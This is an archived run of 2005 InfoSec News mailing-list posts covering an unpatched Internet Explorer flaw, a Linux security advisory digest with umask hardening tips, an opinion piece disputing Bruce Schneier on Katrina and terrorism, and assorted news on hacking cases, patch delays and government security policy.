Explorer browser sports a flaw that hackers could use to launch a remote attack on Windows XP SP2, eEye Digital Security said Thursday. "The flaw is remotely exploitable," said Mike Puterbaugh, eEye's director of product management. Although eEye has notified Microsoft of the bug -- and Microsoft has confirmed receipt of the report -- no patch is available. According to eEye, that's not unusual: on average, Microsoft has taken 132 days to patch holes that the Aliso Viejo, Calif.-based security vendor has reported since February 2004. eEye takes the unique step of logging its reports to Microsoft, then showing the number of days since the vulnerability was confirmed by the Redmond company. After 60 days, it considers a patch "overdue." Internet Explorer, says eEye, has at least five other critical, but unpatched, vulnerabilities, including ones reported 15, 46, 129, 134, and 171 days ago. Microsoft has been patching IE regularly, but is having trouble keeping up with the browser's vulnerabilities. In August, it fixed three bugs in the browser, and since the first of the year, has patched IE five out of nine months. From isn at c4i.org Mon Sep 19 02:08:01 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 19 02:14:12 2005 Subject: [ISN] Cryptology officers renamed Message-ID: http://www.navytimes.com/story.php?f=1-292925-1106128.php By Andrew Scutro Times staff writer September 15, 2005 Navy cryptology officers will now be known as "information warfare" officers, according to a Navy administration message released Thursday. According to the message, the name change is meant to account for increased skills and responsibilities of signals intelligence, from monitoring radio traffic and breaking codes to more modern uses and methods. According to Naval Personnel Command in Millington, Tenn., information warfare officers are still a restricted line community, not an unrestricted line like aviators and submariners. Officers in the category are not required to take any administrative action, according to the message. From isn at c4i.org Mon Sep 19 02:08:36 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 19 02:14:34 2005 Subject: [ISN] Linux Advisory Watch - September 16th 2005 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | September 16th, 2005 Volume 6, Number 38a | +---------------------------------------------------------------------+ Editors: Dave Wreski Benjamin D. Thomas dave@linuxsecurity.com ben@linuxsecurity.com Linux Advisory Watch is a comprehensive newsletter that outlines the security vulnerabilities that have been announced throughout the week. It includes pointers to updated packages and descriptions of each vulnerability. This week, advisories were released for apache, kdelibs, cvs, mod_ssl, tdiary, squid, mozilla, common-lisp, turqstat, slib, umb-scheme, psmisc, gtk, file, subversion, unzip, e2fsprogs, selinux-policy-targeted, firefox, mozilla, vte, xdelta, tvtime, dhcp, gnupg, util-linux, mc, libwnck, pcre, exim, and squid. The distributors include, Debian, Fedora, Gentoo, and Red Hat. --- ## Master of Science in Information Security ## Earn your Master of Science in Information Security online from Norwich University. Designated a "Center of Excellence", the program offers a solid education in the management of information assurance, and the unique case study method melds theory into practice. Using today's e-Learning technology, you can earn this esteemed degree, without disrupting your career or home life. LEARN MORE: http://www.msia.norwich.edu/linux_en --- Using umask The umask can be used to control the default file permission on newly-created files. The umask command controls the default file and directory creation mode for newly-created files and directories. It is recommended that you make root's umask 077, which will disable read, write, and execute permission for other users, unless explictly changed using chmod. The umask command can be used to determine the default file creation mode on your system. It is the octal complement of the desired file mode. If files are created without any regard to their permissions settings, a user could inadvertently give read or write permission to someone that should not have this permission. The umask for the creation of new executable files is calculated as follows: 777 Default Permissions -022 Subtract umask value, for example ----- 755 Allowed Permissions So in this example we chose 022 as our umask. This shows us that new executables that are created are given mode 755, which means that the owner can read, write, and execute the binary, while members of the group to which the binary belongs, and all others, can only read and execute it. The umask for the creation of new text files is calculated as follows: 666 Default Permissions -022 Subtract umask mask, for example ----- 644 Allowed Permissions This example shows us that given the default umask of 666, and subtracting our sample umask value of 022, new text files are created with mode 644, which states that the owner can read and write the file, while members of the group to which the file belongs, and everyone else can only read the new file. Typically umask settings include 022, 027, and 077, which is the most restrictive. Normally the umask is set in /etc/profile, so it applies to all users on the system. The file creation mask must be set while keeping in mind the purpose of the account. Permissions that are too restrictive may cause users to start sharing accounts or passwords, or otherwise compromise security. For example, you may have a line that looks like this: # Set the user's default umask umask 033 Be sure to make root's umask to at least 022, which will disable write and execute permission for other users, unless explicitly changed using chmod(1). READ ENTIRE ARTICLE: http://www.linuxsecurity.com/content/view/117255/141/ ---------------------- Linux File & Directory Permissions Mistakes One common mistake Linux administrators make is having file and directory permissions that are far too liberal and allow access beyond that which is needed for proper system operations. A full explanation of unix file permissions is beyond the scope of this article, so I'll assume you are familiar with the usage of such tools as chmod, chown, and chgrp. If you'd like a refresher, one is available right here on linuxsecurity.com. http://www.linuxsecurity.com/content/view/119415/49/ --- Buffer Overflow Basics A buffer overflow occurs when a program or process tries to store more data in a temporary data storage area than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. http://www.linuxsecurity.com/content/view/119087/49/ --- Review: The Book of Postfix: State-of-the-Art Message Transport I was very impressed with "The Book of Postfix" by authors Ralf Hildebrandt and Pattrick Koetter and feel that it is an incredible Postfix reference. It gives a great overall view of the operation and management of Postfix in an extremely systematic and practical format. It flows in a logical manner, is easy to follow and the authors did a great job of explaining topics with attention paid to real world applications and how to avoid many of the associated pitfalls. I am happy to have this reference in my collection. http://www.linuxsecurity.com/content/view/119027/49/ -------- --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------------------+ | Distribution: Debian | ----------------------------// +---------------------------------+ * Debian: New Apache packages fix HTTP request smuggling 8th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120330 * Debian: New kdelibs packages fix backup file information leak 8th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120332 * Debian: New Apache2 packages fix several vulnerabilities 8th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120338 * Debian: New cvs packages fix insecure temporary files 9th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120343 * Debian: New mod_ssl packages fix acl restriction bypass 12th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120360 * Debian: New tdiary packages fix Cross Site Request Forgery 12th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120370 * Debian: New squid packages fix several vulnerabilities 13th, September, 2005 Update package. http://www.linuxsecurity.com/content/view/120374 * Debian: New Mozilla packages fix several vulnerabilities 13th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120377 * Debian: New common-lisp-controller packages fix arbitrary code injection 14th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120380 * Debian: New turqstat packages fix buffer overflow 15th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120389 * Debian: New centericq packages fix several vulnerabilities 15th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120392 +---------------------------------+ | Distribution: Fedora | ----------------------------// +---------------------------------+ * Fedora Core 4 Update: slib-3a1-3.fc4 8th, September, 2005 *.scm and *.init scripts shipped with slib expect that slib is located directly in /usr/local/lib what's not true. This update fixes this problem. http://www.linuxsecurity.com/content/view/120334 * Fedora Core 4 Update: umb-scheme-3.2-39.fc4 8th, September, 2005 UMB-scheme package conflicts with the SLIB package by instalation of /usr/share/info/slib.info.gz. This update fixes the issue. http://www.linuxsecurity.com/content/view/120335 * Fedora Core 4 Update: psmisc-21.5-5 8th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120336 * Fedora Core 4 Update: glib2-2.6.6-1 8th, September, 2005 GLib 2.6.6 fixes several bugs in the GOption cmdline option parser, in the GKeyFile keyfile parser, a possible deadlock with threadpools and several other bugs. http://www.linuxsecurity.com/content/view/120340 * Fedora Core 4 Update: gtk2-2.6.10-1 8th, September, 2005 GTK+ 2.6.10 fixes numerous bugs in the file chooser, the icon view, and some other widgets. See the release announcements at http://www.gtk.org for more details. http://www.linuxsecurity.com/content/view/120341 * Fedora Core 4 Update: file-4.15-fc4.1 9th, September, 2005 Several bug fixes and new magics. http://www.linuxsecurity.com/content/view/120344 * Fedora Core 4 Update: subversion-1.2.3-2.1 9th, September, 2005 This update includes the latest stable release of Subversion, including a number of bug fixes. http://www.linuxsecurity.com/content/view/120346 * Fedora Core 3 Update: unzip-5.51-4.fc3 9th, September, 2005 This update fixes TOCTOU issue in unzip. http://www.linuxsecurity.com/content/view/120347 * Fedora Core 4 Update: util-linux-2.12p-9.10 9th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120348 * Fedora Core 4 Update: e2fsprogs-1.38-0.FC4.1 9th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120349 * Fedora Core 4 Update: selinux-policy-targeted-1.25.4-10.1 9th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120350 * Fedora Core 3 Update: e2fsprogs-1.38-0.FC3.1 9th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120351 * Fedora Core 4 Update: firefox-1.0.6-1.2.fc4 10th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120354 * Fedora Core 3 Update: firefox-1.0.6-1.2.fc3 10th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120355 * Fedora Core 4 Update: mozilla-1.7.10-1.5.2 10th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120356 * Fedora Core 3 Update: mozilla-1.7.10-1.3.2 10th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120357 * Fedora Core 3 Update: vte-0.11.14-3.fc3 12th, September, 2005 Please report regressions to GNOME Bugzilla. http://www.linuxsecurity.com/content/view/120361 * Fedora Core 4 Update: vte-0.11.14-3.fc4 12th, September, 2005 Please report regressions to GNOME Bugzilla. http://www.linuxsecurity.com/content/view/120362 * Fedora Core 4 Update: slib-3a1-4.fc4 12th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120364 * Fedora Core 4 Update: xdelta-1.1.3-17.fc4 12th, September, 2005 xdelta shipped with FC4 isn't compiled with large file support and uses obsolete glib-1.2 library. The libedsio symbols are missing from the installed libxdelta library. This release introduces xdelta ported to glib-2 and fixes the noted issues. http://www.linuxsecurity.com/content/view/120365 * Fedora Core 3 Update: xdelta-1.1.3-16.fc3 12th, September, 2005 xdelta shipped with FC3 isn't compiled with large file support and uses obsolete glib-1.2 library. The libedsio symbols are missing from the installed libxdelta library. This release introduces xdelta ported to glib-2 and fixes the noted issues. http://www.linuxsecurity.com/content/view/120366 * Fedora Core 4 Update: tvtime-1.0.1-0.fc4.1 12th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120367 * Fedora Core 4 Update: evolution-data-server-1.2.3-3.fc4 12th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120368 * Fedora Core 4 Update: openssh-4.2p1-fc4.1 12th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120369 * Fedora Core 4 Update: dhcp-3.0.2-22.FC4 13th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120373 * Fedora Core 3 Update: gnupg-1.2.7-1 14th, September, 2005 This update upgrades GnuPG from version 1.2.6 to version 1.2.7, fixing bug #139209 (~/.gnupg not created when gpg is first run), among others. http://www.linuxsecurity.com/content/view/120383 * Fedora Core 4 Update: util-linux-2.12p-9.11 14th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120384 * Fedora Core 3 Update: mc-4.6.1-2.FC3 14th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120385 * Fedora Core 3 Update: util-linux-2.12a-24.5 14th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120386 * Fedora Core 4 Update: mc-4.6.1a-0.12.FC4 14th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120387 * Fedora Core 4 Update: libwnck-2.10.3-1 14th, September, 2005 This update upgrades libwnck to version 2.10.3 in order to work well with metacity 2.10.3. This updated package corrects the behavior of workspace switching when minized windows from a different workspace than the current workspace are activated. http://www.linuxsecurity.com/content/view/120388 +---------------------------------+ | Distribution: Gentoo | ----------------------------// +---------------------------------+ * Gentoo: X.Org Heap overflow in pixmap allocation 12th, September, 2005 An integer overflow in pixmap memory allocation potentially allows any X.Org user to execute arbitrary code with elevated privileges. http://www.linuxsecurity.com/content/view/120363 * Gentoo: Python Heap overflow in the included PCRE library 12th, September, 2005 The "re" Python module is vulnerable to a heap overflow, possibly leading to the execution of arbitrary code. http://www.linuxsecurity.com/content/view/120371 +---------------------------------+ | Distribution: Red Hat | ----------------------------// +---------------------------------+ * RedHat: Moderate: pcre security update 8th, September, 2005 Updated pcre packages are now available to correct a security issue. This update has been rated as having moderate security impact by the Red Hat Security Response Team http://www.linuxsecurity.com/content/view/120337 * RedHat: Moderate: exim security update 8th, September, 2005 Updated exim packages that fix a security issue in PCRE and a free space computation on large file system bug are now available for Red Hat Enterprise Linux 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120339 * RedHat: Critical: firefox security update 9th, September, 2005 An updated firefox package that fixes as security bug is now available for Red Hat Enterprise Linux 4. This update has been rated as having critical security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120352 * RedHat: Critical: mozilla security update 9th, September, 2005 An updated mozilla package that fixes a security bug is now available. This update has been rated as having critical security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120353 * RedHat: Important: XFree86 security update 12th, September, 2005 Updated XFree86 packages that fix several integer overflows are now available for Red Hat Enterprise Linux 2.1. This update has been rated as having important security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120372 * RedHat: Important: xorg-x11 security update 13th, September, 2005 Updated X.org packages that fix several integer overflows are now available for Red Hat Enterprise Linux 4. This update has been rated as having important security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120378 * RedHat: Important: XFree86 security update 15th, September, 2005 This update has been rated as having important security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120390 * RedHat: Important: squid security update 15th, September, 2005 An updated Squid package that fixes security issues is now available. This update has been rated as having important security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120391 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Mon Sep 19 02:09:31 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 19 02:14:53 2005 Subject: [ISN] Bruce Schneier: Wrong on Katrina, Wrong on Terrorism Message-ID: Forwarded from: Dan Verton http://www.itsecuritymagazine.com/its/Editors%20Desk/verton_opinion_schneier_091505.htm Bruce Schneier: Wrong About Katrina, Wrong About Terrorism Posted 9/15/05 By Dan Verton Executive Editor Homeland Defense Journal The Minneapolis Star Tribune recently ran an editorial by Bruce Schneier, the chief technology officer at Counterpane Internet Security Inc., in which the esteemed technologist blamed the failure of federal, state and local officials to respond effectively to the aftermath of Hurricane Katrina on a lack of funding for emergency responders. He also implies that America's homeland security community can prepare for both natural disasters and terrorist attacks in the same way because, according to Schneier, large-scale terrorist attacks and natural disasters "are very similar in aftermath." Schneier, a technologist with no known formal training and education in military operations or traditional security, is wrong on both accounts. First off, no amount of money could have made up for the leadership failure at all levels of government that led to the post-Katrina response disaster. Money cannot fix a broken decision cycle or the inability of federal, state and local officials to properly plan for a disaster. More money would not have pre-deployed the appropriate number of National Guard troops, generators for hospitals, buses for evacuees who had no transportation, or critical supplies, such as food, water and medicines. All of those necessities existed prior to Katrina making landfall. What prevented the effective use of those assets was a failure of leadership and imagination. If you want to know how federal, state and local leaders failed, seek answers to the following questions: 1. Why didn't Louisiana Governor Kathleen Blanco order the pre-positioning of adequate forces and first-responders? Could it be that she was betting the storm would turn at the last moment and that the levees would hold? 2. Why did New Orleans Mayor Ray Nagin fail to use all of the transportation assets at his disposal to bus people out of the city days before Katrina hit? And if he was not given appropriate resources by the state, why didn't he approach the federal government for direct assistance? 3. Why didn't the federal government, specifically Secretary of Homeland Security Michael Chertoff and the now former director of FEMA, Michael Brown, question what was clearly an inadequate pre-disaster plan in New Orleans? Isn't that a key responsibility of those overseeing the nationwide homeland security mission? So please, Mr. Schneier, don't tell America or the people of New Orleans that money could have prevented their suffering. It is not only preposterous to blame the response failure on money (although funding for first responders and the oversight of how those monies are used have been issues that the Bush administration has failed to address) but such ill-informed statements threaten to distract attention from the real issue of failing leadership and a lack of imagination in disaster planning. That brings me to my second point. Mr. Schneier wants Americans to believe that terrorists and hurricanes are alike, and that if we can properly prepare for one we will be prepared for the other. This is perhaps the most preposterous claim made in his editorial and one that clearly shows the limit of Mr. Schneier's homeland security expertise. This is not a personal attack. But Mr. Schneier is a technologist and has spent his entire career doing things like writing encryption algorithms. He has not spent any time to my knowledge in the trenches managing military or government homeland security initiatives. What Mr. Schneier fails to understand is that while terrorist attacks and natural disasters may in fact lead to a comparable amount of confusion - what is known in military parlance as the fog of war - they differ significantly in many critical aspects. First, natural disasters are random events that can leave one facility in shambles while a neighboring facility remains unscathed. In addition, natural disasters, particularly hurricanes, are known events that give ample indications and warning as to their intended target area and potential for destruction. A hurricane should be a homeland security or emergency manager's dream scenario - because if you have to experience a disaster, you might as well experience one that you have days to prepare for. Terrorists, on the other hand, are not the mindless forces of nature that hurricanes are. Terrorists plan their attacks, sometimes years in advance. They also carefully select their targets - there is very little randomness to terrorist attacks, particularly the new terrorism as characterized by Osama bin Laden and al-Qaeda. Hurricanes do not care if they damage critical infrastructures. Al-Qaeda trains its operatives in the most effective ways to destroy or damage critical infrastructures. Hurricanes do not care about the financial toll that follows their powerful blow. Osama bin Laden is on film trying to assess the cost to the U.S. economy of the Sept. 11, 2001 terrorist attacks. Likewise, hurricanes do not intentionally target symbols of American government and economic power. Terrorists have made those symbols a primary target. Hurricanes do not conduct surveillance of their potential landfall areas and produce targeting packages designed to ensure the greatest chance of success. Terrorists, particularly al-Qaeda, do. Hurricanes do not time their landfall with the morning or evening rush hour, they do not target specific economic sectors of the economy, and they do not seek out population centers. Terrorists do. Finally, hurricanes are not gathering in far away places conspiring to acquire weapons of mass destruction and planning ways to smuggle those weapons into the United States. Al-Qaeda is doing just that. And when they get here, they will not provide us with advance indications and warning that we are so lucky to receive from our natural enemy, the hurricane. -=- About The Author Dan Verton is the author of three books on security and terrorism, and has advised the Department of Homeland Security, the FBI and the U.S. Secret Service. He currently serves as the executive editor of Homeland Defense Journal and IT*Security Magazine, and is a former intelligence officer in the United States Marine Corps. Visit him online at www.danverton.com From isn at c4i.org Tue Sep 20 04:06:57 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 20 04:13:01 2005 Subject: [ISN] Financial Firms Create Disaster Recovery Standards Message-ID: http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,104724,00.html By Lucas Mearian SEPTEMBER 19, 2005 COMPUTERWORLD Driven by a number of disasters in recent years, several financial services firms and IT vendors have joined forces to create disaster recovery and business continuity standards. The Resiliency Maturity Model Project, overseen by the New York-based Financial Services Technology Consortium, will create benchmarks and define terms for business continuity planning across all areas of a financial enterprise, said Charles Wallen, managing executive of FSTC's Business Continuity Standing Committee and the project's director. Plans to create the standards, which will also be available to companies in other industries, were announced last week by the FSTC. Wallen said recent disasters like Hurricane Katrina reaffirm the need for "strong business continuity plans and a road map for third-party providers to understand what's needed. We have to do a better job at raising the bar." Financial services companies involved in the project include CitiBank, J.P. Morgan Chase & Co., Bank of America Corp. and MasterCard International Inc. IBM, Carnegie Mellon University and Disaster Recovery Institute International are also participating. A Measure of Resiliency A MasterCard spokeswoman said her company hopes the project can help other organizations move beyond disaster recovery into organizational sustainability. "We're looking at models to measure the resiliency of an organization," she said. Wallen said the project, slated to be completed next spring, should give companies a road map to plan and measure their resiliency against a set of industry standards. Brian Finley, chief technology officer at PSSD/World Medical Inc., a $1.5 billion medical equipment supply company in Jacksonville, Fla., agreed with the need for such standards but predicted that few companies will use them to prepare for disasters. "I've seen and heard of customers that never test [disaster recovery plans]," Finley said. "Even if you create a set of standards, somebody's got to buy into those standards, and someone has to financially back the testing and documentation and the process and controls around it." PSSD is not involved in the standards project. The Resiliency Maturity Model Project is being carried out in two phases. The first, expected to be completed this month, will identify a list of disaster recovery capabilities that companies need. Pittsburgh-based Carnegie Mellon is providing the project with some maturity modeling methodologies that can identify different levels of preparedness organizations can reach. The second phase, to be completed next spring, will include benchmarks and maturity models that will let companies compare their preparedness against some 40 standard capabilities. Guillermo Kopp, an analyst at TowerGroup in Needham, Mass., said he believes the effort could lead to more business adoption of disaster recovery standards, because such frameworks can prove return on investment. "The challenge is to keep the level of attention high," he said. "These projects are not a slam-dunk. It's more of a journey." From isn at c4i.org Tue Sep 20 04:07:29 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 20 04:13:24 2005 Subject: [ISN] OSS means slower patches Message-ID: http://australianit.news.com.au/articles/0,7204,16650762%5E15306%5E%5Enbv%5E,00.html Chris Jenkins SEPTEMBER 19, 2005 THE growing popularity of open-source browsers and software may be responsible for the increasing gap between the exposure of a vulnerability and the provision of patch to fix it, security software vendor Symantec has said. In its second Internet Security Threat Report for 2005, Symantec found the time from vulnerability to the availability of a patch has "blown out" to 54 days in the period from January to June, Symantec Australia managing director David Sykes said. Symantec had not published previously statistics on the average time required to produce patches, but Mr Sykes said data showed the lag had previously been about 30 days. An average of 10 new vulnerabilities per day were discovered during the first half of 2005, Mr Sykes said. In practice, large companies with around 10,000 employees were now looking at 50 days between vulnerability and the installation of patches across systems, he said. Mr Sykes said the increasing popularity of open source software, such as the Mozilla Foundation's Firefox browser, could be part of the reason for the increase in the gap between vulnerability and patch, with the open source development model itself part of the problem. "It is relying on the goodwill and best efforts of many people, and that doesn't have the same commercial imperative," he said. "I'm sure that is part of what is causing the blow-out in the patch window." "The Mozilla family of browsers had the highest number of vulnerabilities during the first six months of 2005, with 25," the Symantec report says. "Eighteen of these, or 72 per cent, were rated as high severity. Microsoft Internet Explorer had 13 vendor confirmed vulnerabilities, of which eight, or 62 per cent, were considered high severity." The growth in Firefox vulnerability reports coincides with its increasing popularity with users. "It is very clear that Firefox is gaining acceptance and I would therefore expect to see it targeted," Mr Sykes said. "People don't attack browsers and systems per se, they attack the people that use them," he said. "As soon as large banks started using Linux, Linux vulnerabilities started to get exploited." The report also found that recent internet attacks had aimed at different targets. "For the first time, the education sector and small business came in front of financial services as the most attacked industries," Mr Sykes said. From isn at c4i.org Tue Sep 20 04:07:53 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 20 04:13:39 2005 Subject: [ISN] Two of accused hacker trio allowed back in Bay High classes Message-ID: http://www.theledger.com/apps/pbcs.dll/article?AID=/20050919/APN/509191190 The Associated Press PANAMA CITY, Fla. September 19, 2005 Two of the three students accused of hacking into a Bay County computer system and changing grades for friends have since been allowed back in class, but the third was expelled for one semester. Beau Brothers, 16, was expelled after three of five county school board members voted to support the move. Brothers was charged with offense against intellectual property, a felony, earlier this month. His alleged cohorts, Jeremiah Mason and Kyle Parkinson, both 16, served suspensions before returning to school. They are charged with being a principal to offense against intellectual property, also a felony. Brothers committed the crime while Mason and Parkinson "assisted," sheriff's investigator Paul Vecker told The News Herald of Panama City for its Tuesday editions. The teens reportedly gained access to the system when a teacher allowed them to use a computer that was linked to the programs storing grades and school attendance records. The students were not given passwords to the system, but were able to gain entry anyhow. Teachers discovered the grade changes when they routinely checked grade books to make sure they matched report cards. The alleged hackers were in advanced computer classes and didn't need to change their own grades because they were good students, school officials said. From isn at c4i.org Tue Sep 20 04:06:28 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 20 04:14:01 2005 Subject: [ISN] NSF, Iowa State to launch cybersecurity center Message-ID: http://www.networkworld.com/news/2005/091995-nsf-cybersecurity.html By Grant Gross IDG News Service 09/19/05 Iowa State University and the U.S. National Science Foundation (NSF) will join with private businesses to attack cybersecurity problems such as wireless security in a research center opening this year, participants were to announce Monday. The new Center for Information Protection, funded mostly through membership fees paid by cybersecurity vendors and users, will focus on short-term cybersecurity issues, possibly including research on methods to comply with federal regulations such as Sarbanes-Oxley, said Doug Jacobson, an Iowa State engineering professor and CTO at Palisade Systems, a network management and security vendor. The center, the first cybersecurity-focused effort in the NSF's Industry/University Cooperative Research Centers Program, will focus on issues identified by member companies, Jacobson said. The program has provided seed money for dozens of research projects, many of which are spun out into organizations fully supported by private industry. The goal of the center will be to come up with new technologies that participants can use to fight common cybersecurity problems, Jacobson said. The intellectual property developed by the center will be shared among member organizations, and members will be able to use the ideas that are generated in products they sell. So far, about 15 organizations have signed up as charter members of the Center for Information Protection, which will be based at Iowa State, Jacobson said. The center is looking for a range of companies, including cybersecurity vendors and consumers of cybersecurity products, he added. "We want to bring together not only providers of security solutions, but we want to bring together organizations that have the problems," he said. "We're kind of a neutral third party. We're trying to bring all these people together to solve problems." Among the center's charter members are Palisade Systems, The Boeing Co., Cargill and the New Jersey Institute of Technology. The new center will focus on near-term cybersecurity issues, unlike the NSF's Global Environment for Networking Investigations, or GENI, initiative, announced last month. Backers of GENI have proposed an NSF project to come up with a more secure, next-generation Internet, but that project would focus its efforts on a futuristic approach. Instead, the Iowa State center will take a shorter view, Jacobson said. "We're focusing on problems that are a year or two years out," he said. "We're focused on the problems the companies have today." NSF has funded a number of projects focused on network security since the U.S. Congress passed the Cybersecurity R&D Act in 2002, said Carl Landwehr, coordinator of the Cyber Trust program in the NSF's Computer and Information Science and Engineering Directorate. "There's a growing awareness that cybersecurity is limiting what we are confident doing over the Internet," Landwehr said. "The National Science Foundation is trying to address that." In addition to creating new cybersecurity technology, the new center can also educate people about the importance of cybersecurity and train new experts, Landwehr said. "We need technologists educated in these areas." From isn at c4i.org Tue Sep 20 04:08:30 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 20 04:14:21 2005 Subject: [ISN] S. Korea steps up security measures on electronic commerce Message-ID: http://english.yna.co.kr/Engnews/20050920/660000000020050920114009E8.html 2005/09/20 SEOUL, Sept. 20 (Yonhap) -- South Korea unveiled a set of security measures on electronic commerce Tuesday, hoping to ease consumer fears about buying goods or conducting banking transactions on the Internet. Under the three-pronged measures, the government will build and distribute a new anti-hacking software with stronger security features, the Ministry of Information and Communication said in a statement. In addition, Internet users will be required to install a firewall program for all kinds of online financial transactions such as stock trading and insurance, to prevent hackers from stealing personal information. So far, only Internet banking users have been required to install the firewall software. The government also plans to overhaul its management system on public authentication service, which guarantees users' identification in the cyber marketplace. The measures were jointly drawn up by related government offices such as the Financial Supervisory Service and the Ministry of Commerce, Industry and Energy, the Information Ministry said. South Korea is one of the world's most wired countries. More than 12 million people out of its 48 million population have a high-speed Internet connection, marking the world's highest per-capita broadband Internet penetration. Worries about sending personal data or credit card information through cyberspace have long served as a drag on e-commerce, ministry officials said. From isn at c4i.org Wed Sep 21 00:10:47 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 21 00:20:42 2005 Subject: [ISN] PG&E says firm fired for hacking Message-ID: http://www.insidebayarea.com/trivalleyherald/localnews/ci_3045437 By Greg Chang BLOOMBERG NEWS 09/20/2005 PG&E Corp's Pacific Gas & Electric utility said it fired a consulting company suspected of hacking into the computer system of an irrigation district thats trying to take over territory from the utility. An employee of the consultant, Meridian Pacific Inc., allegedly obtained computer files last week from the Manteca-based South San Joaquin Irrigation District, which is attempting to take over territory with about 35,000 power meters, PG&E spokesman Jon Tremayne said in an interview Monday. Executives at Meridian didnt respond immediately to a phone call seeking comment. Its very clearly unethical behavior, and from our perspective its absolutely unacceptable, Tremayne said. The incident underscores challenges San Francisco-based PG&E faces from public agencies and government-owned utilities seeking to offer electric services at lower prices. The Sacramento Municipal Utility District is attempting to take over part of the utilitys territory near the cities of Davis and Woodland. Im disappointed but Im not surprised, said Jeff Shields, utility systems director at the South San Joaquin Irrigation District, who has been spearheading the districts drive to acquire a 112-square-mile portion of Pacific Gass territory. A Meridian Pacific employee who was attending the Sept. 13 meeting of the South San Joaquin Irrigation Districts board allegedly broke into the districts system and downloaded files by accessing a wireless network, Tremayne said. Six or seven of the documents were e-mailed to an employee of PG&E, Tremayne said. The employee contacted the utilitys legal department after reviewing two of the documents, and the Federal Bureau of Investigation and South San Joaquin Irrigation District were notified, he said. FBI officials werent immediately available for comment. From isn at c4i.org Wed Sep 21 00:11:01 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 21 00:21:03 2005 Subject: [ISN] Navy restricts use of handheld devices Message-ID: http://www.fcw.com/article90865-09-20-05-Web By Frank Tiboni Sept. 20, 2005 Two months after issuing guidelines on the appropriate use of information technology, the Navy has released rules for handheld devices, including wireless telephones. Navy personnel can use wireless phones, personal digital assistants (PDAs) and callings cards only for "official and authorized purposes." If they use them for personal use, they must reimburse the government for the use and charges, according to a Navy memo titled, "Department of the Navy Policy for Issuance, Use and Management of Government-Provided Mobile (Cellular) Phone, Data Equipment and Services, and Calling Cards." [1] Dave Wennergren, the Department of the Navy?s chief information officer, said in the memo that the policy will improve accountability and management of wireless phones, PDAs and callings cards. He said the service must also "move away from suboptimized independent management of telecommunications to a centralized enterprisewide approach.: Leaders of the Navy and Marine Corps must manage the use of these devices and enforce the new rules. They must also ensure that workers receive wireless security training. In July, the Navy issued policy for the acceptable use of IT. One of the six rules states that personnel can no longer access personal e-mail accounts from the service?s networks without approval. [1] http://www.doncio.navy.mil/(tnvffhbnek2nxretrbnwj3ne)/PolicyMatrix/download.aspx?id=97e0d5c7-b312-4caf-acba-a512c75a3e4d From isn at c4i.org Wed Sep 21 00:09:43 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 21 00:21:32 2005 Subject: [ISN] Google to launch Wi-Fi service? Message-ID: http://www.networkworld.com/news/2005/092005-google-wi-fi.html By Nancy Gohring IDG News Service 09/20/05 Google may be close to launching a Wi-Fi service. A page on the Google Web site instructs customers on how to download Google Secure Access, a client that the site says "allows you to establish a more secure connection while using Google WiFi." A Google spokeswoman could not comment further on the company's Wi-Fi plans or strategy. In April, Google began sponsoring a free hot spot in San Francisco's Union Square. In August, Business 2.0 magazine published a report on rumors that Google had begun buying access to fiber across the U.S. Industry observers have since speculated that Google may be on the verge of offering some sort of access service, potentially using Wi-Fi. The Google Web page says that the Secure Access program can be downloaded at 